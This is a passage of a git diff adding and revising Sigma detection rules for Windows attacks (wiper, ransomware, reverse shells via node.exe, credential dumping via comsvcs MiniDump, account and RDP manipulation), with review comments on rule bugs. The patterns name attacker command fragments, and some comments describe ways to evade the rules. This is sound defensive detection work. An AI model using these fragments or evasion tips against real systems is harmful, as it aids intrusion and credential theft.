- 'localgroup' + - 'admin' + - '' + - CommandLine|contains: + - '\Win64.exe' + condition: selection falsepositives: - - Unknown + - Unknown level: high tags: - - attack.privilege_escalation - - attack.g0009 - - attack.t1068 + - attack.privilege_escalation + - attack.g0009 + - attack.t1068 
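Review bot: In the hurricane_panda hunk the re-indented list under `CommandLine|contains|all` replaces `- '/add'` with `- ''`, an empty string. An empty value under a `contains` modifier is effectively a bare wildcard, so the third term matches every command line and the rule now fires on any invocation containing `localgroup` and `admin` (for example `net localgroup administrators` enumeration) instead of only on additions; this is a silent logic change in what is otherwise a whitespace-only commit. Restore the original value: `- '/add'`.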
diff --git a/rules/windows/process_creation/proc_creation_win_apt_wocao.yml b/rules/windows/process_creation/proc_creation_win_apt_wocao.yml index 8897c3feb..5aeb7d762 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_wocao.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_wocao.yml @@ -10,7 +10,7 @@ references: - https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/ - https://twitter.com/SBousseaden/status/1207671369963646976 tags: - - attack.discovery + - attack.discovery - attack.t1012 - attack.defense_evasion - attack.t1036.004 @@ -25,7 +25,7 @@ logsource: product: windows detection: selection: - CommandLine|contains: + CommandLine|contains: - 'checkadmin.exe 127.0.0.1 -all' - 'netsh advfirewall firewall add rule name=powershell dir=in' - 'cmd /c powershell.exe -ep bypass -file c:\s.ps1' @@ -39,4 +39,4 @@ detection: condition: selection falsepositives: - Administrators that use checkadmin.exe tool to enumerate local administrators -level: high \ No newline at end of file +level: high diff --git a/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml b/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml new file mode 100644 index 000000000..27af17f89 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml 
@@ -0,0 +1,30 @@ +title: Email Exifiltration Via Powershell +id: 312d0384-401c-4b8b-abdf-685ffba9a332 +status: experimental +description: Detects email exfiltration via powershell cmdlets +author: Nasreddine Bencherchali (rule), Azure-Sentinel (idea) +references: + - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ + - https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml +date: 2022/09/09 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: + - '\powershell.exe' + - '\pwsh.exe' + CommandLine|contains|all: + - 'Add-PSSnapin' + - 'Get-Recipient' + - '-ExpandProperty' + - 'EmailAddresses' + - 'SmtpAddress' + - '-hidetableheaders' + condition: selection +falsepositives: + - Unknown +level: high +tags: + - attack.exfiltration diff --git a/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml b/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml new file mode 100644 index 000000000..d4b9155c8 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml 
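Review bot: The detection requires all six substrings, including `-hidetableheaders` and `-ExpandProperty`, which are output-formatting choices rather than part of the exfiltration; dropping `-hidetableheaders` or writing `Select -Expand` instead of `-ExpandProperty` is enough to evade the rule while still dumping every recipient's SMTP address. I would remove `- '-hidetableheaders'` from the `contains|all` list (keeping `Add-PSSnapin`, `Get-Recipient`, `EmailAddresses`, `SmtpAddress`), and if the remaining terms prove too noisy, hold the cosmetic flags in a second selection rather than the mandatory one. The title also has a typo: `title: Email Exfiltration Via Powershell`.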
@@ -0,0 +1,32 @@ +title: Root Certificate Installed From Susp Locations +id: 5f6a601c-2ecb-498b-9c33-660362323afa +status: experimental +description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. +references: + - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ + - https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps +author: Nasreddine Bencherchali +date: 2022/09/09 +tags: + - attack.defense_evasion + - attack.t1553.004 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - 'Import-Certificate' + - ' -File-Path ' + - 'Cert:\LocalMachine\Root' + CommandLine|contains: + - '\AppData\Local\Temp\' + - 'C:\Windows\TEMP\' + - '\Desktop\' + - '\Downloads\' + - '\Perflogs\' + - 'C:\Users\Public\' + condition: selection +falsepositives: + - Unlikely +level: high diff --git a/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml b/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml index 6d2b0f135..010f2b9c5 100644 --- a/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml +++ b/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml 
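Review bot: `- ' -File-Path '` in the `CommandLine|contains|all` list will never match a real invocation: the `Import-Certificate` cmdlet's parameter (see the docs page referenced by the rule) is `-FilePath`, without the inner hyphen, so the rule is dead on arrival for the very command it documents. Change it to `- ' -FilePath '`. Since PowerShell also accepts unambiguous parameter prefixes and positional binding, consider whether that term is needed at all, as `Import-Certificate` plus `Cert:\LocalMachine\Root` plus a suspicious source directory already carries the detection.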
@@ -1,27 +1,31 @@ title: Hermetic Wiper TG Process Patterns id: 2f974656-6d83-4059-bbdf-68ac5403422f status: experimental -description: This rule detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022 +description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022 author: Florian Roth references: - - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia + - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia date: 2022/02/25 -modified: 2022/08/13 +modified: 2022/09/09 +tags: + - attack.execution + - attack.lateral_movement + - attack.t1021.001 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection1: - Image|endswith: '\policydefinitions\postgresql.exe' - selection2: - - CommandLine|contains: - - 'CSIDL_SYSTEM_DRIVE\temp\sys.tmp' - - ' 1> \\\\127.0.0.1\ADMIN$\__16' - - CommandLine|contains|all: - - 'powershell -c ' - - '\comsvcs.dll MiniDump ' - - '\winupd.log full' - condition: 1 of selection* + selection1: + Image|endswith: '\policydefinitions\postgresql.exe' + selection2: + - CommandLine|contains: + - 'CSIDL_SYSTEM_DRIVE\temp\sys.tmp' + - ' 1> \\\\127.0.0.1\ADMIN$\__16' + - CommandLine|contains|all: + - 'powershell -c ' + - '\comsvcs.dll MiniDump ' + - '\winupd.log full' + condition: 1 of selection* falsepositives: - - Unknown + - Unknown level: high diff --git a/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml b/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml index 46f530fb0..7b5553b72 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml 
@@ -3,7 +3,7 @@ id: f57f8d16-1f39-4dcb-a604-6c73d9b54b3d description: Detects a command that accesses password storing registry hives via volume shadow backups author: Max Altgelt, Tobias Michalski date: 2021/08/09 -modified: 2022/08/13 +modified: 2022/09/09 status: experimental references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 @@ -25,7 +25,7 @@ detection: condition: all of selection* falsepositives: - Some rare backup scenarios -level: medium +level: high tags: - attack.impact - - attack.t1490 \ No newline at end of file + - attack.t1490 diff --git a/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml b/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml index 61ff3daf2..699f0e26e 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml 
@@ -4,36 +4,36 @@ status: test description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil author: Florian Roth, Tom Ueltschi references: - - https://securelist.com/schroedingers-petya/78870/ - - https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100 + - https://securelist.com/schroedingers-petya/78870/ + - https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100 date: 2019/01/16 modified: 2022/03/05 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - select_pipe_com: - CommandLine|contains|all: - - '\AppData\Local\Temp\' - - '\\\\.\\pipe\\' - select_rundll32_dash1: - Image|endswith: '\rundll32.exe' - CommandLine|endswith: - - '.dat,#1' - - '.dat #1' # Sysmon removes comma - select_perfc_keyword: - - '\perfc.dat' - condition: 1 of select* + select_pipe_com: + CommandLine|contains|all: + - '\AppData\Local\Temp\' + - '\\\\.\\pipe\\' + select_rundll32_dash1: + Image|endswith: '\rundll32.exe' + CommandLine|endswith: + - '.dat,#1' + - '.dat #1' # Sysmon removes comma + select_perfc_keyword: + - '\perfc.dat' + condition: 1 of select* fields: - - CommandLine - - ParentCommandLine + - CommandLine + - ParentCommandLine falsepositives: - - Admin activity + - Admin activity level: critical tags: - - attack.defense_evasion - - attack.t1218.011 - - attack.t1070.001 - - attack.credential_access - - attack.t1003.001 - - car.2016-04-002 + - attack.defense_evasion + - attack.t1218.011 + - attack.t1070.001 + - attack.credential_access + - attack.t1003.001 + - car.2016-04-002 
diff --git a/rules/windows/process_creation/proc_creation_win_net_add_local_user.yml b/rules/windows/process_creation/proc_creation_win_net_add_local_user.yml new file mode 100644 index 000000000..d7cc1ee7b --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_net_add_local_user.yml @@ -0,0 +1,26 @@ +title: Net User Add Local User +id: 57ea3cf7-f2bf-419f-b51e-6a60635ebf0d +status: stable +description: Detects attempts to add new local user +references: + - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html +author: Nasreddine Bencherchali +date: 2022/09/09 +tags: + - attack.persistence + - attack.t1136.001 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: + - '\net.exe' + - '\net1.exe' + CommandLine|contains|all: + - ' user ' + - '/add' + condition: selection +falsepositives: + - Legitimate use of net.exe utility by legitimate users and admins to add local user +level: low diff --git a/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml b/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml index 8dedecc69..8144e75f1 100644 --- a/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml +++ b/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml @@ -6,7 +6,9 @@ author: Nasreddine Bencherchali references: - https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ + - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ date: 2022/09/01 +modified: 2022/09/09 logsource: category: process_creation product: windows 
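Review bot: This brand-new rule is marked `status: stable` on the day it is authored, while every other rule added in the same patch (email exfil, import_cert, node_abuse, redirect_local_admin_share) is `experimental`; a rule that has not been run against production telemetry should not claim stability, so this should be `status: experimental`. On the detection itself, net.exe accepts abbreviated switches, so `net user x p /ad` adds the account while `'/add'` does not match; adding `'/ad'` (or loosening to `' /ad'`) would close that gap if the false-positive budget allows. Note too that `net user x p /add /domain` creates a domain account yet the rule is titled and tagged as local (`attack.t1136.001`).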
@@ -28,6 +30,7 @@ detection: - ' Administratör ' # Swedish - ' Administrator ' # English - ' guest ' + - ' DefaultAccount ' # The cases below are for when an attacker requests the net command via 'cmd /c....' # First in double quotes - ' "Järjestelmänvalvoja" ' # Finish @@ -38,6 +41,7 @@ detection: - ' "Administratör" ' # Swedish - ' "Administrator" ' # English - ' "guest" ' + - ' "DefaultAccount" ' # Second in single quotes - " 'Järjestelmänvalvoja' " # Finish - " 'Rendszergazda' " # Hungarian @@ -47,6 +51,7 @@ detection: - " 'Administratör' " # Swedish - " 'Administrator' " # English - " 'guest' " + - " 'DefaultAccount' " filter: CommandLine|contains|all: - 'guest' diff --git a/rules/windows/process_creation/proc_creation_win_net_recon.yml b/rules/windows/process_creation/proc_creation_win_net_recon.yml index 7a57ffdbf..d67432ef9 100644 --- a/rules/windows/process_creation/proc_creation_win_net_recon.yml +++ b/rules/windows/process_creation/proc_creation_win_net_recon.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE author: Florian Roth, omkar72, @svch0st, Nasreddine Bencherchali date: 2019/01/16 -modified: 2022/09/02 +modified: 2022/09/09 references: - https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/ @@ -33,11 +33,13 @@ detection: CommandLine|contains: # Add more groups for other languages - 'domain admins' - - ' administrators' - - ' administrateurs' + - ' administrator' # Typo without an 'S' so we catch both + - ' administrateur' # Typo without an 'S' so we catch both - 'enterprise admins' - 'Exchange Trusted Subsystem' - 'Remote Desktop Users' + - 'Utilisateurs du Bureau à distance' # French for "Remote Desktop Users" + - 'Usuarios de escritorio remoto' # Spanish for "Remote Desktop Users" - ' /do' # short for domain # Covers 'accounts' flag selection_accounts_root: 
diff --git a/rules/windows/process_creation/proc_creation_win_netsh_allow_port_rdp.yml b/rules/windows/process_creation/proc_creation_win_netsh_allow_port_rdp.yml index f2179507f..a0297ae22 100644 --- a/rules/windows/process_creation/proc_creation_win_netsh_allow_port_rdp.yml +++ b/rules/windows/process_creation/proc_creation_win_netsh_allow_port_rdp.yml @@ -13,16 +13,16 @@ logsource: detection: selection1: CommandLine|contains|all: - - netsh - - firewall add portopening - - tcp 3389 + - 'netsh' + - 'firewall add portopening' + - 'tcp 3389' selection2: CommandLine|contains|all: - - netsh - - advfirewall firewall add rule - - action=allow - - protocol=TCP - - localport=3389 + - 'netsh' + - 'advfirewall firewall add rule' + - 'action=allow' + - 'protocol=TCP' + - 'localport=3389' condition: 1 of selection* falsepositives: - Legitimate administration diff --git a/rules/windows/process_creation/proc_creation_win_node_abuse.yml b/rules/windows/process_creation/proc_creation_win_node_abuse.yml new file mode 100644 index 000000000..9f3f670c7 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_node_abuse.yml 
@@ -0,0 +1,34 @@ +title: Node.exe Process Abuse +id: 6640f31c-01ad-49b5-beb5-83498a5cd8bd +status: experimental +description: Detects the execution node.exe which is shipped with multiple softwares such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc +references: + - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html + - https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return + - https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/ + - https://nodejs.org/api/cli.html +author: Nasreddine Bencherchali +date: 2022/09/09 +tags: + - attack.defense_evasion + - attack.t1127 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\node.exe' + CommandLine|contains: + - ' -e ' + - ' --eval ' + # Add more pattern of abuse as actions + action_reverse_shell: + CommandLine|contains|all: + - '.exec(' + - 'net.socket' + - '.connect' + - 'child_process' + condition: selection and 1 of action_* +falsepositives: + - Unlikely +level: high diff --git a/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml b/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml new file mode 100644 index 000000000..bbb5763ce --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml 
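Review bot: `selection` only keys on `' -e '` and `' --eval '`, but node also evaluates its argument with `-p` / `--print` (the referenced CLI reference lists it as identical to `-e` except that it prints the result), so the same reverse-shell one-liner run with `node -p` slips past the rule. Add `- ' -p '` and `- ' --print '` to the `CommandLine|contains` list. The `action_reverse_shell` terms (`.exec(`, `net.socket`, `.connect`, `child_process`) are matched case-insensitively by most backends, so `net.Socket` is fine, but be aware `spawn(` instead of `exec(` is an equally common shape for these payloads.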
@@ -0,0 +1,26 @@
+title: Suspicious Redirect To Local Admin Share
+id: 77d570aa-4e72-4949-98ff-24cdeec16787
+status: experimental
+description: Detects output redirection to the local admin share (ADMIN$) via the commandline
+author: Nasreddine Bencherchali
+references:
+ - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
+date: 2022/09/09
+tags:
+ - attack.execution
+ - attack.lateral_movement
+ - attack.t1021.001
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ CommandLine|contains:
+ - ' 1 > \\\\127.0.0.1\ADMIN$\'
+ - ' 1> \\\\127.0.0.1\ADMIN$\'
+ - ' 1 >\\\\127.0.0.1\ADMIN$\'
+ - ' 1>\\\\127.0.0.1\ADMIN$\'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
diff --git a/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml b/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml
index 59ecd7e3a..b99236f7c 100644
--- a/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml
+++ b/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml
@@ -6,7 +6,7 @@ author: '@Kostastsale, @TheDFIRReport, slightly modified by pH-T'
references:
- https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
date: 2022/02/12
-modified: 2022/08/06
+modified: 2022/09/09
logsource:
product: windows
category: process_creation
@@ -15,7 +15,7 @@ detection:
Image|endswith: '\reg.exe'
CommandLine|contains|all:
- ' add '
- - '\SYSTEM\CurrentControlSet\Control\Terminal Server'
+ - '\CurrentControlSet\Control\Terminal Server'
- 'REG_DWORD'
- ' /f'
selection_values_1:
@@ -34,6 +34,7 @@ detection:
- 'TSAdvertise'
- 'AllowTSConnections'
- 'fSingleSessionPerUser'
+ - 'fDenyTSConnections'
condition: selection_cli and 1 of selection_values_*
falsepositives:
- Unknown
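Review bot: The `fDenyTSConnections` value added to the last hunk of `proc_creation_win_reg_enable_rdp.yml` is matched without any check on the data written: `selection_cli` only requires ` add `, the Terminal Server key, `REG_DWORD` and ` /f`, so a hardening command that sets `fDenyTSConnections` to 1 (which disables RDP) fires the rule exactly like the enabling form. If the rule is meant to alert on RDP being enabled, the value should pair with a data check for the enabling value (0 for this one) in a dedicated selection, or the accepted false positive should be recorded under `falsepositives` instead of `- Unknown`. The `selection_values_1` block starts outside the hunk, so I cannot see whether other values already carry such a data check.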
diff --git a/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml b/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml
index ccce2dfb8..70609b700 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml
@@ -1,9 +1,13 @@
title: Add User to Local Administrators
id: ad720b90-25ad-43ff-9b5e-5c841facc8e5
+related:
+ - id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e
+ type: similar
status: experimental
-description: Detects suspicious command line that adds an account to the local administrators group
-author: Florian Roth
+description: Detects suspicious command line that adds an account to the local administrators/administrateurs group
+author: Florian Roth, Nasreddine Bencherchali
date: 2022/08/12
+modified: 2022/09/09
references:
- https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1
logsource:
@@ -13,11 +17,18 @@ tags:
- attack.persistence
- attack.t1098
detection:
- selection:
- CommandLine|contains|all:
- - 'localgroup administrators '
+ selection_main:
+ - CommandLine|contains|all:
+ - 'localgroup '
- ' /add'
- condition: selection
+ - CommandLine|contains|all:
+ - 'Add-LocalGroupMember '
+ - ' -Group '
+ selection_group:
+ CommandLine|contains:
+ - ' administrators '
+ - ' administrateur' # Typo without an 'S' so we catch both
+ condition: all of selection_*
falsepositives:
- Administrative activity
level: medium
diff --git a/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml b/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml
index 9a00f386a..fb61b61ee 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml
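Review bot: `selection_group` matches `' administrators '` with a space on both sides, which is inconsistent with the `Add-LocalGroupMember -Group` form the new `selection_main` entry introduces: administrators routinely quote the group name there, and a quoted `Administrators` has no surrounding spaces, so that branch of `selection_main` will rarely pair with `selection_group`. Either drop the trailing space or list the quoted forms alongside. The inline comment `# Typo without an 'S' so we catch both` is also misleading since the truncation is deliberate; `# Intentionally truncated so both 'administrateur' and 'administrateurs' match` states the intent. The sibling remote-desktop rule in the next hunk uses unpadded group names, so only this file is affected.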
@@ -1,28 +1,38 @@
title: Suspicious Add User to Remote Desktop Users Group
id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e
+related:
+ - id: ad720b90-25ad-43ff-9b5e-5c841facc8e5
+ type: similar
status: experimental
description: Detects suspicious command line in which a user gets added to the local Remote Desktop Users group
author: Florian Roth
date: 2021/12/06
+modified: 2022/09/09
references:
- https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/
tags:
- attack.persistence
+ - attack.lateral_movement
- attack.t1133
- attack.t1136.001
- - attack.lateral_movement
- attack.t1021.001
logsource:
category: process_creation
product: windows
detection:
- selection:
- CommandLine|contains|all:
- - 'net '
- - 'localgroup'
+ selection_main:
+ - CommandLine|contains|all:
+ - 'localgroup '
+ - ' /add'
+ - CommandLine|contains|all:
+ - 'Add-LocalGroupMember '
+ - ' -Group '
+ selection_group:
+ CommandLine|contains:
- 'Remote Desktop Users'
- - '/add'
- condition: selection
+ - 'Utilisateurs du Bureau à distance' # French for "Remote Desktop Users"
+ - 'Usuarios de escritorio remoto' # Spanish for "Remote Desktop Users"
+ condition: all of selection_*
fields:
- CommandLine
- ParentCommandLine
diff --git a/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml b/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml
index 5b184ccfb..ff0b5b957 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml
@@ -10,7 +10,7 @@ references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md
- https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html
date: 2022/07/14
-modified: 2022/08/04
+modified: 2022/09/09
logsource:
category: process_creation
product: windows
@@ -35,6 +35,7 @@ detection:
- 'dllhost'
- 'cmd '
- 'cmd.exe /c'
+ - 'cmd.exe /k'
- 'rundll32'
# Add more suspicious paths
- 'C:\Users\Public'
diff --git a/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml b/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml
index c034f4a89..e8fa9ebea 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml
@@ -7,7 +7,7 @@ references:
- https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md
author: frack113, Nasreddine Bencherchali
date: 2022/08/19
-modified: 2022/09/08
+modified: 2022/09/09
logsource:
category: process_creation
product: windows
@@ -22,6 +22,7 @@ detection:
- '\Policies\Microsoft\Windows\OOBE'
- '\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon'
- '\CurrentControlSet\Control\SecurityProviders\WDigest'
+ - '\Microsoft\Windows Defender\'
condition: all of selection_*
falsepositives:
- Rare legitimate add to registry via cli (to these locations)
diff --git a/rules/windows/process_creation/proc_creation_win_susp_reg_bitlocker.yml b/rules/windows/process_creation/proc_creation_win_susp_reg_bitlocker.yml
index 791985d1a..31d6d74ac 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_reg_bitlocker.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_reg_bitlocker.yml
@@ -1,7 +1,7 @@
title: Suspicious Reg Add BitLocker
id: 0e0255bf-2548-47b8-9582-c0955c9283f5
status: experimental
-description: Suspicious add key for BitLocker
+description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility
references:
- https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/
tags:
@@ -9,19 +9,18 @@ tags:
- attack.t1486
author: frack113
date: 2021/11/15
-modified: 2022/08/05
+modified: 2022/09/09
logsource:
category: process_creation
product: windows
detection:
- set:
+ selection:
CommandLine|contains|all:
- 'REG'
- 'ADD'
- '\SOFTWARE\Policies\Microsoft\FVE'
- '/v'
- '/f'
- key:
CommandLine|contains:
- 'EnableBDEWithNoTPM'
- 'UseAdvancedStartup'
@@ -31,7 +30,7 @@ detection:
- 'RecoveryKeyMessageSource'
- 'UseTPMPIN'
- 'RecoveryKeyMessage'
- condition: set and key
+ condition: selection
falsepositives:
- - Unknown
-level: medium
+ - Unlikely
+level: high
diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml
new file mode 100644
index 000000000..aa3f20a37
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml
@@ -0,0 +1,36 @@
+title: Delete Important Scheduled Task
+id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78
+related:
+ - id: 9ac94dc8-9042-493c-ba45-3b5e7c86b980
+ type: derived
+status: experimental
+description: Detects when adversaries stop services or processes by disabling their respective schdueled tasks in order to conduct data destructive activities
+author: Nasreddine Bencherchali
+references:
+ - Internal Research
+date: 2022/09/09
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ schtasks_exe:
+ Image|endswith: '\schtasks.exe'
+ CommandLine|contains|all:
+ - '/delete'
+ - '/tn'
+ CommandLine|contains:
+ # Add more important tasks
+ - '\Windows\SystemRestore\SR'
+ - '\Windows\Windows Defender\'
+ - '\Windows\BitLocker'
+ - '\Windows\WindowsBackup\'
+ - '\Windows\WindowsUpdate\'
+ - '\Windows\UpdateOrchestrator\'
+ - '\Windows\ExploitGuard'
+ condition: all of schtasks_*
+falsepositives:
+ - Unlikely
+level: high
+tags:
+ - attack.impact
+ - attack.t1489
diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml
new file mode 100644
index 000000000..28aefc946
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml
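Review bot: The `description` of the new rule was copied from the disable rule and does not describe this one: it says the tasks are "disabling"-ed while the detection matches `/delete`, and it misspells "scheduled" as `schdueled`; the same misspelling is introduced in the rewritten description of `proc_creation_win_susp_schtasks_disable.yml` in the next file section. Suggest `description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities`. The `related` entry marks this rule as `derived` from the disable rule; a one-line comment on why delete and disable are kept as separate rules (different impact, different level) would help the next maintainer decide where to add new task names.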
@@ -0,0 +1,25 @@
+title: Delete All Scheduled Tasks
+id: 220457c1-1c9f-4c2e-afe6-9598926222c1
+status: experimental
+description: Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.
+author: Nasreddine Bencherchali
+references:
+ - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete
+date: 2022/09/09
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ Image|endswith: '\schtasks.exe'
+ CommandLine|contains|all:
+ - ' /delete '
+ - '/tn *'
+ - ' /f'
+ condition: selection
+falsepositives:
+ - Unlikely
+level: high
+tags:
+ - attack.impact
+ - attack.t1489
diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml
index 2abc0aaa4..e46a19f3b 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml
@@ -1,7 +1,7 @@
title: Disable Important Scheduled Task
id: 9ac94dc8-9042-493c-ba45-3b5e7c86b980
status: experimental
-description: Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange, SQL Server...etc.
+description: Detects when adversaries stop services or processes by disabling their respective schdueled tasks in order to conduct data destructive activities
author: frack113, Nasreddine Bencherchali
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task
@@ -19,15 +19,15 @@ detection:
- '/Change'
- '/TN'
- '/disable'
- #split to add other
CommandLine|contains:
- - 'Microsoft\Windows\SystemRestore\SR'
- - 'Microsoft\Windows\Windows Defender\'
- - 'Microsoft\Windows\BitLocker'
- - 'Microsoft\Windows\WindowsBackup\'
- - 'Microsoft\Windows\WindowsUpdate\'
- - 'Microsoft\Windows\UpdateOrchestrator\'
- - 'Windows\ExploitGuard'
+ # Add more important tasks
+ - '\Windows\SystemRestore\SR'
+ - '\Windows\Windows Defender\'
+ - '\Windows\BitLocker'
+ - '\Windows\WindowsBackup\'
+ - '\Windows\WindowsUpdate\'
+ - '\Windows\UpdateOrchestrator\'
